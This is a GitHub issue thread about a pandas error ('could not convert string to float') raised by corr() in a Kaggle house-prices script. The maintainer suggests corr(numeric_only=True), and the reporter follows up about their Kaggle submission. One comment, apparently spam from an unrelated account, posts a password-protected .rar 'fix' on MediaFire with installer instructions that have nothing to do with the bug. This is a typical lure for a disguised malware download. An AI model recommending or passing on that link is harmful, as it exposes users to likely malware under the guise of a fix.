### ISSUE TITLE
running error at corrmat = all_features.corr()

### ISSUE THREAD

**Issue by VisImage** [Evergreen0929/Kaggle_House_Prices_Transformer_Pytorch#3]
I have got the following error message when running the Linear.py
windows 11, conda environment.

Thank you

Shi Yin

-----------------------------------------------------------------------------
(kagglehouse) G:\gitHub\KaggleHouse\Kaggle_House_Prices_PyTorch\python_code>python linear.py
(1460, 81) (1459, 80)
   Id  MSSubClass MSZoning  LotFrontage SaleType SaleCondition  SalePrice
0   1          60       RL         65.0       WD        Normal     208500
1   2          20       RL         80.0       WD        Normal     181500
2   3          60       RL         68.0       WD        Normal     223500
3   4          70       RL         60.0       WD       Abnorml     140000
Traceback (most recent call last):
  File "G:\gitHub\KaggleHouse\Kaggle_House_Prices_PyTorch\python_code\linear.py", line 45, in <module>
    corrmat = all_features.corr()
              ^^^^^^^^^^^^^^^^^^^
  File "C:\Users\yins\.conda\envs\kagglehouse\Lib\site-packages\pandas\core\frame.py", line 11049, in corr
    mat = data.to_numpy(dtype=float, na_value=np.nan, copy=False)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\yins\.conda\envs\kagglehouse\Lib\site-packages\pandas\core\frame.py", line 1993, in to_numpy
    result = self._mgr.as_array(dtype=dtype, copy=copy, na_value=na_value)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\yins\.conda\envs\kagglehouse\Lib\site-packages\pandas\core\internals\managers.py", line 1694, in as_array
    arr = self._interleave(dtype=dtype, na_value=na_value)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\yins\.conda\envs\kagglehouse\Lib\site-packages\pandas\core\internals\managers.py", line 1753, in _interleave
    result[rl.indexer] = arr
    ~~~~~~^^^^^^^^^^^^
ValueError: could not convert string to float: 'RL'

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Evergreen0929** [comment]
Hope replacing corrmat=all_features.corr() into corrmat=all_features.corr(numeric_only=True) sloves this issue.

**Comment by VisImage** [comment]
Hello,  

Thank you for the replay. There are still some issues after replacing corrmat=all_features.corr() with corrmat=all_features.corr(numeric_only=True) .

The program works like a charm on WSL (windows 11).  but I have submitted the result to kaggle. I cannot find your original submission and do not know if result from my running your program is correct or not. Where can I find your  submission? can you check the attached result and let me know if it is good.

Thank you

Shi Yin
[submission.csv](https://github.com/user-attachments/files/16790619/submission.csv)
